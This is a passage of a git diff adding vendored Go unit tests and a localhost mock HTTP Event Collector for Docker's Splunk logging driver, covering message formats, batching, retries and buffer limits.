Splunk Logging Driver.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notajson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + if *hec.gzipEnabled { + t.Fatal("Gzip should not be used") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "{\"a\":\"b\"}" || + event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message2) + } + + if event, err := message2.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "notajson" || + event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify inline format with a not default settings for most of options +func TestInlineFormatWithNonDefaultOptions(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkSourceKey: "mysource", + splunkSourceTypeKey: "mysourcetype", + splunkIndexKey: "myindex", + splunkFormatKey: splunkFormatInline, + splunkGzipCompressionKey: "true", + tagKey: "{{.ImageName}}/{{.Name}}", + labelsKey: "a", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + ContainerLabels: map[string]string{ + "a": "b", + }, + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerInline) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "mysource" || + splunkLoggerDriver.nullMessage.SourceType != "mysourcetype" || + splunkLoggerDriver.nullMessage.Index != "myindex" || + splunkLoggerDriver.gzipCompression != true || + splunkLoggerDriver.gzipCompressionLevel != gzip.DefaultCompression || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize { + t.Fatal("Values do not match configuration.") + } + + messageTime := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("1"), "stdout", messageTime, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 1 { + t.Fatal("Expected one message") + } + + if !*hec.gzipEnabled { + t.Fatal("Gzip should be used") + } + + message := hec.messages[0] + if message.Time != fmt.Sprintf("%f", float64(messageTime.UnixNano())/float64(time.Second)) || + message.Host != hostname || + message.Source != "mysource" || + message.SourceType != "mysourcetype" || + message.Index != "myindex" { + t.Fatalf("Unexpected values of message %v", message) + } + + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "1" || + event["source"] != "stdout" || + event["tag"] != "container_image_name/container_name" || + event["attrs"].(map[string]interface{})["a"] != "b" || + len(event) != 4 { + t.Fatalf("Unexpected event in message %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify JSON format +func TestJsonFormat(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkFormatKey: splunkFormatJSON, + splunkGzipCompressionKey: "true", + splunkGzipCompressionLevelKey: "1", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerJSON) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != true || + splunkLoggerDriver.gzipCompressionLevel != gzip.BestSpeed || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize { + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"].(map[string]interface{})["a"] != "b" || + event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + // If message cannot be parsed as JSON - it should be sent as a line + if event, err := message2.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "notjson" || + event["source"] != "stdout" || + event["tag"] != "containeriid" || + len(event) != 3 { + t.Fatalf("Unexpected event in message 2 %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify raw format +func TestRawFormat(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkFormatKey: splunkFormatRaw, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize || + string(splunkLoggerDriver.prefix) != "containeriid " { + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid {\"a\":\"b\"}" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + if event, err := message2.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid notjson" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify raw format with labels +func TestRawFormatWithLabels(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkFormatKey: splunkFormatRaw, + labelsKey: "a", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + ContainerLabels: map[string]string{ + "a": "b", + }, + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize || + string(splunkLoggerDriver.prefix) != "containeriid a=b " { + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid a=b {\"a\":\"b\"}" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + if event, err := message2.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "containeriid a=b notjson" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify that Splunk Logging Driver can accept tag="" which will allow to send raw messages +// in the same way we get them in stdout/stderr +func TestRawFormatWithoutTag(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkFormatKey: splunkFormatRaw, + tagKey: "", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerRaw) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize || + string(splunkLoggerDriver.prefix) != "" { + t.Log(string(splunkLoggerDriver.prefix) + "a") + t.Fatal("Values do not match configuration.") + } + + message1Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("{\"a\":\"b\"}"), "stdout", message1Time, nil, false}); err != nil { + t.Fatal(err) + } + message2Time := time.Now() + if err := loggerDriver.Log(&logger.Message{[]byte("notjson"), "stdout", message2Time, nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 2 { + t.Fatal("Expected two messages") + } + + message1 := hec.messages[0] + if message1.Time != fmt.Sprintf("%f", float64(message1Time.UnixNano())/float64(time.Second)) || + message1.Host != hostname || + message1.Source != "" || + message1.SourceType != "" || + message1.Index != "" { + t.Fatalf("Unexpected values of message 1 %v", message1) + } + + if event, err := message1.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "{\"a\":\"b\"}" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + message2 := hec.messages[1] + if message2.Time != fmt.Sprintf("%f", float64(message2Time.UnixNano())/float64(time.Second)) || + message2.Host != hostname || + message2.Source != "" || + message2.SourceType != "" || + message2.Index != "" { + t.Fatalf("Unexpected values of message 2 %v", message2) + } + + if event, err := message2.EventAsString(); err != nil { + t.Fatal(err) + } else { + if event != "notjson" { + t.Fatalf("Unexpected event in message 1 %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify that we will send messages in batches with default batching parameters, +// but change frequency to be sure that numOfRequests will match expected 17 requests +func TestBatching(t *testing.T) { + if err := os.Setenv(envVarPostMessagesFrequency, "10h"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + for i := 0; i < defaultStreamChannelSize*4; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != defaultStreamChannelSize*4 { + t.Fatal("Not all messages delivered") + } + + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + // 1 to verify connection and 16 batches + if hec.numOfRequests != 17 { + t.Fatalf("Unexpected number of requests %d", hec.numOfRequests) + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil { + t.Fatal(err) + } +} + +// Verify that test is using time to fire events not rare than specified frequency +func TestFrequency(t *testing.T) { + if err := os.Setenv(envVarPostMessagesFrequency, "5ms"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + for i := 0; i < 10; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + time.Sleep(15 * time.Millisecond) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 10 { + t.Fatal("Not all messages delivered") + } + + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + // 1 to verify connection and 10 to verify that we have sent messages with required frequency, + // but because frequency is too small (to keep test quick), instead of 11, use 9 if context switches will be slow + if hec.numOfRequests < 9 { + t.Fatalf("Unexpected number of requests %d", hec.numOfRequests) + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil { + t.Fatal(err) + } +} + +// Simulate behavior similar to first version of Splunk Logging Driver, when we were sending one message +// per request +func TestOneMessagePerRequest(t *testing.T) { + if err := os.Setenv(envVarPostMessagesFrequency, "10h"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesBatchSize, "1"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, "1"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + for i := 0; i < 10; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 10 { + t.Fatal("Not all messages delivered") + } + + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + // 1 to verify connection and 10 messages + if hec.numOfRequests != 11 { + t.Fatalf("Unexpected number of requests %d", hec.numOfRequests) + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesFrequency, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, ""); err != nil { + t.Fatal(err) + } +} + +// Driver should not be created when HEC is unresponsive +func TestVerify(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + hec.simulateServerError = true + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + _, err := New(ctx) + if err == nil { + t.Fatal("Expecting driver to fail, when server is unresponsive") + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify that user can specify to skip verification that Splunk HEC is working. +// Also in this test we verify retry logic. +func TestSkipVerify(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + hec.simulateServerError = true + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkVerifyConnectionKey: "false", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if hec.connectionVerified { + t.Fatal("Connection should not be verified") + } + + for i := 0; i < defaultStreamChannelSize*2; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + if len(hec.messages) != 0 { + t.Fatal("No messages should be accepted at this point") + } + + hec.simulateServerError = false + + for i := defaultStreamChannelSize * 2; i < defaultStreamChannelSize*4; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != defaultStreamChannelSize*4 { + t.Fatal("Not all messages delivered") + } + + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} + +// Verify logic for when we filled whole buffer +func TestBufferMaximum(t *testing.T) { + if err := os.Setenv(envVarPostMessagesBatchSize, "2"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, "10"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + hec.simulateServerError = true + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkVerifyConnectionKey: "false", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if hec.connectionVerified { + t.Fatal("Connection should not be verified") + } + + for i := 0; i < 11; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + if len(hec.messages) != 0 { + t.Fatal("No messages should be accepted at this point") + } + + hec.simulateServerError = false + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 9 { + t.Fatalf("Expected # of messages %d, got %d", 9, len(hec.messages)) + } + + // First 1000 messages are written to daemon log when buffer was full + for i, message := range hec.messages { + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != fmt.Sprintf("%d", i+2) { + t.Fatalf("Unexpected event in message %v", event) + } + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, ""); err != nil { + t.Fatal(err) + } +} + +// Verify that we are not blocking close when HEC is down for the whole time +func TestServerAlwaysDown(t *testing.T) { + if err := os.Setenv(envVarPostMessagesBatchSize, "2"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, "4"); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, "0"); err != nil { + t.Fatal(err) + } + + hec := NewHTTPEventCollectorMock(t) + hec.simulateServerError = true + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + splunkVerifyConnectionKey: "false", + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if hec.connectionVerified { + t.Fatal("Connection should not be verified") + } + + for i := 0; i < 5; i++ { + if err := loggerDriver.Log(&logger.Message{[]byte(fmt.Sprintf("%d", i)), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if len(hec.messages) != 0 { + t.Fatal("No messages should be sent") + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarPostMessagesBatchSize, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarBufferMaximum, ""); err != nil { + t.Fatal(err) + } + + if err := os.Setenv(envVarStreamChannelSize, ""); err != nil { + t.Fatal(err) + } +} + +// Cannot send messages after we close driver +func TestCannotSendAfterClose(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "/container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if err := loggerDriver.Log(&logger.Message{[]byte("message1"), "stdout", time.Now(), nil, false}); err != nil { + t.Fatal(err) + } + + err = loggerDriver.Close() + if err != nil { + t.Fatal(err) + } + + if err := loggerDriver.Log(&logger.Message{[]byte("message2"), "stdout", time.Now(), nil, false}); err == nil { + t.Fatal("Driver should not allow to send messages after close") + } + + if len(hec.messages) != 1 { + t.Fatal("Only one message should be sent") + } + + message := hec.messages[0] + if event, err := message.EventAsMap(); err != nil { + t.Fatal(err) + } else { + if event["line"] != "message1" { + t.Fatalf("Unexpected event in message %v", event) + } + } + + err = hec.Close() + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go new file mode 100644 index 0000000000..e508948280 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go @@ -0,0 +1,157 @@ +package splunk + +import ( + "compress/gzip" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "net/http" + "testing" +) + +func (message *splunkMessage) EventAsString() (string, error) { + if val, ok := message.Event.(string); ok { + return val, nil + } + return "", fmt.Errorf("Cannot cast Event %v to string", message.Event) +} + +func (message *splunkMessage) EventAsMap() (map[string]interface{}, error) { + if val, ok := message.Event.(map[string]interface{}); ok { + return val, nil + } + return nil, fmt.Errorf("Cannot cast Event %v to map", message.Event) +} + +type HTTPEventCollectorMock struct { + tcpAddr *net.TCPAddr + tcpListener *net.TCPListener + + token string + simulateServerError bool + + test *testing.T + + connectionVerified bool + gzipEnabled *bool + messages []*splunkMessage + numOfRequests int +} + +func NewHTTPEventCollectorMock(t *testing.T) *HTTPEventCollectorMock { + tcpAddr := &net.TCPAddr{IP: []byte{127, 0, 0, 1}, Port: 0, Zone: ""} + tcpListener, err := net.ListenTCP("tcp", tcpAddr) + if err != nil { + t.Fatal(err) + } + return &HTTPEventCollectorMock{ + tcpAddr: tcpAddr, + tcpListener: tcpListener, + token: "4642492F-D8BD-47F1-A005-0C08AE4657DF", + simulateServerError: false, + test: t, + connectionVerified: false} +} + +func (hec *HTTPEventCollectorMock) URL() string { + return "http://" + hec.tcpListener.Addr().String() +} + +func (hec *HTTPEventCollectorMock) Serve() error { + return http.Serve(hec.tcpListener, hec) +} + +func (hec *HTTPEventCollectorMock) Close() error { + return hec.tcpListener.Close() +} + +func (hec *HTTPEventCollectorMock) ServeHTTP(writer http.ResponseWriter, request *http.Request) { + var err error + + hec.numOfRequests++ + + if hec.simulateServerError { + if request.Body != nil { + defer request.Body.Close() + } + writer.WriteHeader(http.StatusInternalServerError) + return + } + + switch request.Method { + case http.MethodOptions: + // Verify that options method is getting called only once + if hec.connectionVerified { + 